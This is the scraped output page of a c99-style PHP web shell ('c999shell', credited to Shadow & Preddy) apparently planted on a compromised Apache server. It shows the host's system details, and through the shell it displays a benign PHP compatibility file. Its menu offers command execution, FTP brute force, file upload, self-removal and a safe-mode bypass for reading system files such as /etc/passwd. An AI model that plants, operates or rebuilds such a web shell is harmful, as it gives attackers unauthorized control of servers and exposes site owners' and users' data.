!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/includes/   drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     compat.php42x.php (3.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
* @version $Revision: 1.1 $ * @internal resource_context is not supported * @since PHP 5 * @require PHP 4.0.1 (trigger_error) */ if (!function_exists('file_get_contents')) { function file_get_contents($filename, $incpath = false, $resource_context = null) { if (false === $fh = fopen($filename, 'rb', $incpath)) { trigger_error('file_get_contents() failed to open stream: No such file or directory', E_USER_WARNING); return false; } clearstatcache(); if ($fsize = @filesize($filename)) { $data = fread($fh, $fsize); } else { $data = ''; while (!feof($fh)) { $data .= fread($fh, 8192); } } fclose($fh); return $data; } } if (!defined('FILE_USE_INCLUDE_PATH')) { define('FILE_USE_INCLUDE_PATH', 1); } if (!defined('FILE_APPEND')) { define('FILE_APPEND', 8); } /** * Replace file_put_contents() * * @category PHP * @package PHP_Compat * @link http://php.net/function.file_put_contents * @author Aidan Lister * @version $Revision: 1.1 $ * @internal resource_context is not supported * @since PHP 5 * @require PHP 4.0.1 (trigger_error) */ if (!function_exists('file_put_contents')) { function file_put_contents($filename, $content, $flags = null, $resource_context = null) { // If $content is an array, convert it to a string if (is_array($content)) { $content = implode('', $content); } // If we don't have a string, throw an error if (!is_scalar($content)) { trigger_error('file_put_contents() The 2nd parameter should be either a string or an array', E_USER_WARNING); return false; } // Get the length of date to write $length = strlen($content); // Check what mode we are using $mode = ($flags & FILE_APPEND) ? $mode = 'a' : $mode = 'w'; // Check if we're using the include path $use_inc_path = ($flags & FILE_USE_INCLUDE_PATH) ? true : false; // Open the file for writing if (($fh = @fopen($filename, $mode, $use_inc_path)) === false) { trigger_error('file_put_contents() failed to open stream: Permission denied', E_USER_WARNING); return false; } // Write to the file $bytes = 0; if (($bytes = @fwrite($fh, $content)) === false) { $errormsg = sprintf('file_put_contents() Failed to write %d bytes to %s', $length, $filename); trigger_error($errormsg, E_USER_WARNING); return false; } // Close the handle @fclose($fh); // Check all the data was written if ($bytes != $length) { $errormsg = sprintf('file_put_contents() Only %d of %d bytes written, possibly out of free disk space.', $bytes, $length); trigger_error($errormsg, E_USER_WARNING); return false; } // Return length return $bytes; } } ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]--